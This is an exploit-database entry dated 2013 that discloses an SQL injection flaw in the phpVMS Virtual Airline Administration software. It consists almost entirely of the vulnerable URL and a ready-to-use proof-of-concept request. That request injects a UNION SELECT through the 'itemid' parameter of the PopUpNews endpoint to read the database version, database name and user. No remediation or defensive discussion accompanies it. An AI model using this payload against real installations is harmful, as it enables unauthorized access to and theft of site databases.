id: 20654
date: 04/15/2013
title: phpVMS Virtual Airline Administration  - SQL Injection Vulnerability
author: NoGe
cves: 

[o] Exploit
 
       http://localhost/[path]/index.php/PopUpNews/popupnewsitem/?itemid=[SQLi]
 
 
=============================================================================================================
 
 
  [o] PoC
 
       http://localhost/path/index.php/PopUpNews/popupnewsitem/?itemid=123+union+select+1,version(),database(),4,user()--

#  0day.today [2023-03-23]  #